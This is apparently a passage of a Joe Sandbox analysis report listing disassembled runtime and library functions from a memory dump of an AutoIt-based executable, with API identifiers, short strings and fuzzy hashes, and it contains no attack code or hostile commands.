                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                          • Instruction ID: d603c7007c112051966a976ee8e9199f7f2a32ac4ba0e04061ab7c5c242d798a
                                                                          • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                          • Instruction Fuzzy Hash: 2611B621A0E68555FF10F710E1512F99360FF85B84FC55130D68D476AAFE2CD206CB20
                                                                          Function 00007FF7ADC6DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                          • Instruction ID: 5ebe9ff74a698e88cd56b767a00e1c1d02b415728bd19988d50d62528bf8ea50
                                                                          • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                          • Instruction Fuzzy Hash: 5211B622B0E68195FB10FB10E5512F9A360FF89B84FC55131D68D47669EF2CD607CB20
                                                                          Function 00007FF7ADCAFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3712363035-3916222277
                                                                          • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                          • Instruction ID: 22961d414efe6c51b63af2315e14194496fd48b8ded3331f76672603f2ca5d9d
                                                                          • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                          • Instruction Fuzzy Hash: 0E115172A1D7419EE714AF12F81019AF6A5FB88780FC55136EA4947A74DF3CD092CB14
                                                                          Function 00007FF7ADC6DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                          • Instruction ID: 38c6d5088339c0382776d630410c6f51a67c9cca69c6644a912f52d3888b87f9
                                                                          • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                          • Instruction Fuzzy Hash: 6E01C821A1E58296EA20F720E5502F9D320FF85784FC25131E58D47AAAFE2CD20ACB11
                                                                          Function 00007FF7ADC415B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                          • String ID: !$tan
                                                                          • API String ID: 3384550415-2428968949
                                                                          • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                          • Instruction ID: c97b10ab6613f36b089d2e7931f5f020d180b6c79a10aedefdc91edd7ae78b26
                                                                          • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                          • Instruction Fuzzy Hash: 1401D671E2DB8545DA14DF12A40437AA192FBDA7D4F904334EA9E0BB94FF7CD0418B00
                                                                          Function 00007FF7ADC6C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 2030045667-4017498283
                                                                          • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                          • Instruction ID: d22301dde8dc159006fe54e98ac2551be6bbb2f1066a88629df32f5f74aef04b
                                                                          • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                          • Instruction Fuzzy Hash: D5F0E520B1E2864AEB18B795F6513B9A261DF4C780FD55431D94D0BBBAFDBDE4838320
                                                                          Function 00007FF7ADC275C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF7ADC275E9
                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF7ADC27241,?,?,?,?,00007FF7ADC2660C,?,?,?,?,00007FF7ADC24CD3), ref: 00007FF7ADC27600
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Valuetry_get_function
                                                                          • String ID: FlsSetValue
                                                                          • API String ID: 738293619-3750699315
                                                                          • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                          • Instruction ID: 17f7776d7d7f20f483b5ebe5c96c1f781d88a13800bd03da4cb64c8b8550f571
                                                                          • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                          • Instruction Fuzzy Hash: 4BE0E5A1A0E58285EB057B44E4400B5A361EF48B81FCA4031D90D072B0FE3CE946C620
                                                                          Function 00007FF7ADC25620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ADC25629
                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7ADC2563A
                                                                            • Part of subcall function 00007FF7ADC27018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC2563F), ref: 00007FF7ADC2708D
                                                                            • Part of subcall function 00007FF7ADC27018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC2563F), ref: 00007FF7ADC270BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                          • String ID: Unknown exception
                                                                          • API String ID: 3561508498-410509341
                                                                          • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                          • Instruction ID: 39e94c0ae2f5cb85d82f731cc9f1f42565513d7851aafc72b0e013b3a564f14f
                                                                          • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                          • Instruction Fuzzy Hash: 35D01762A2E98699DE20FB04D8813A9E330FB84308FD14431E24D425B5FF2CD64BD720